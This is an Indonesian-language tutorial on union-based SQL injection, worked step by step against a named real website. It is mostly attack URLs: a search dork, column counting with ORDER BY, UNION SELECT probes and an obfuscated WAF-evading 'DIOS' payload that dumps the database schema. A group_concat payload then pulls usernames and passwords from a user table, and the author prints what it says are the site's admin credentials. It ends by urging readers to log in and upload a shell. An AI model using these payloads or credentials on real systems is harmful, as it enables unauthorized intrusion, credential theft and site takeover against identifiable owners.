cara sql injection dump in one shoot

SQL injection

apa itu sql injection? sql injection adalah serangan injeksi yang dilakukan para attacker untuk mendapatkan sebuah file sensitif, biasanya untuk mencari username dan password admin login

bagaimana cara kerjanya? ikuti saya 

pertama attacker dork terlebih dahulu dork yang biasa dipakai yaitu

inurl:php?id= site:com

nah itu adalah example saja. disini saya menggunakan contoh

website https://maimunainternational.com

sql injection harus mencari parameter nya terlebih dahulu untuk mengeksekusi web nya dengan cara? php?id= 

misal https://maimunainternational.com php?id= nah pasti akan mencul banyak jika ada parameternya 

disini saya mendapatkan https://maimunainternational.com/productdetail.php?id=5

nb: paramter itu seperti angka contohnya web diatas mempunyai paramter 5

bagaimana cara mengeksekusinya?

- pertama tama kita harus mengecek terlebih dahulu web tersebut vuln sql injection atau tidak, caranya adalah menambahkan sebuah quot petik 1 atau (') di bagian parameter

nah jika error biasanya ada sebuah warning "your have in sql sytax"

ada banyak macam error

1. "gambar hilang"
2. "blank putih"

3. "ke redirect"

4. "gambar rusak"

nah sekarang kita akan mengeksekusi web nya 

https://maimunainternational.com/productdetail.php?id=5'

nah kebetulan web ini kalo error gambarnya hilang, sekarang kita lanjut dengan balancing, untuk mengecek apakah membutuhkan quot ' atau tidak dengan cara --+- contoh

https://maimunainternational.com/productdetail.php?id=5'--+-

nah jika kembali normal berarti webnya membutuhkan qout ' jika tidak kembali normal maka tidak membutuhkan quot ' pahamkan? semoga paham :v

sekarang kita ke tahap selanjutnya yaitu mencari column dari web tersebut menggunakan order by contoh

https://maimunainternational.com/productdetail.php?id=5' order by 1--+- normal

https://maimunainternational.com/productdetail.php?id=5' order by 2--+- normal

https://maimunainternational.com/productdetail.php?id=5' order by 3--+- normal

https://maimunainternational.com/productdetail.php?id=5' order by 4--+- normal

https://maimunainternational.com/productdetail.php?id=5' order by 5--+- normal

https://maimunainternational.com/productdetail.php?id=5' order by 6--+- ERROR

Nah errornya berada di angka 6 maka column nya berada di angka 5.

sekarang kita ketahap mencari angka ajaibnya dengan cara union select

contoh

https://maimunainternational.com/productdetail.php?id=-5' union select 1,2,3,4,5--+-

jangan lupa kasih tanda - didepan parameter seperti contoh diatas, agar apa? agar memunculkan angka ajain tersebut

nah saya mendapatkan 2 angka ajaib yaitu 3 dan 5

nah karena ada 2 angka ajaib disini saya memilih angka 5 untuk menaruh dios nya

bang diosnya mana?

concat/**/(0x3c696d67207372633d2068747470733a2f2f622e746f7034746f702e696f2f705f313732306e70717763302e706e672032306865696768743d203233303070782077696474683d203230307078203c63656e7465723e203c68343e496e6a65637420427920486962696b693c2f68343e,0x55534552,0x3c2f623e,0x3c2f666f6e743e,0x3a3a,0x3c666f6e7420636f6c6f723d677265656e3e,current_user,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x3c623e,0x56455253494f4e,0x3c2f623e,0x3c2f666f6e743e,0x3a3a,0x3c666f6e7420636f6c6f723d677265656e3e,version(),0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x3c623e,0x4441544142415345,0x3c2f623e,0x3c2f666f6e743e,0x3a3a,0x3c666f6e7420636f6c6f723d677265656e3e,database/*data*//**8**/(),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,(select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0x00),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/*data*//****/())and(0x00)in(@x:=/*!50000coNcat/**8**/*/(@x,0x3c6c693e,/*!50000table_name/**8**/*/,0x203a3a3a3a20,/*!50000column_name/**8**/*/))))x))

tuh pake dios itu udh ada waff nya jadi sans hehehe

gambar diatas berhasil untuk melihat db dari web tersebut sekarang kita tinggal dump username dan password 

misal tablenya adalah user_master terus column nya username dan password kita tinggal dump saja,  dios tadi kita hapus seperti ini https://maimunainternational.com/productdetail.php?id=-5' union select 1,2,3,4,5--+-

nah sekarang kita mulai dumpnya,  angka ajaib ada 2 nih 3 dan 5 pilih salah satu kalo aku milih 5 hehe

dios untuk dump

grOUp_ConCat(/*!username*/,0x3e,/*!password*/)

https://maimunainternational.com/productdetail.php?id=-5' union select 1,2,3,4,grOUp_ConCat(/*!username*/,0x3e,/*!password*/) from user_master--+-

nah seperti itu ya cuy table tadi kasih belakang terus from user_master nanti akan muncul username dan password nya 

nah udah ke dump user dan passnya

username: maimuna

password : braizokowaz

tinggal login deh ke halam admin 

oke tinggal upload shell kalian deh wkwkw

sekian dari saya hibiki semoga membatu kalian

nb: untuk pembelajaran saja :'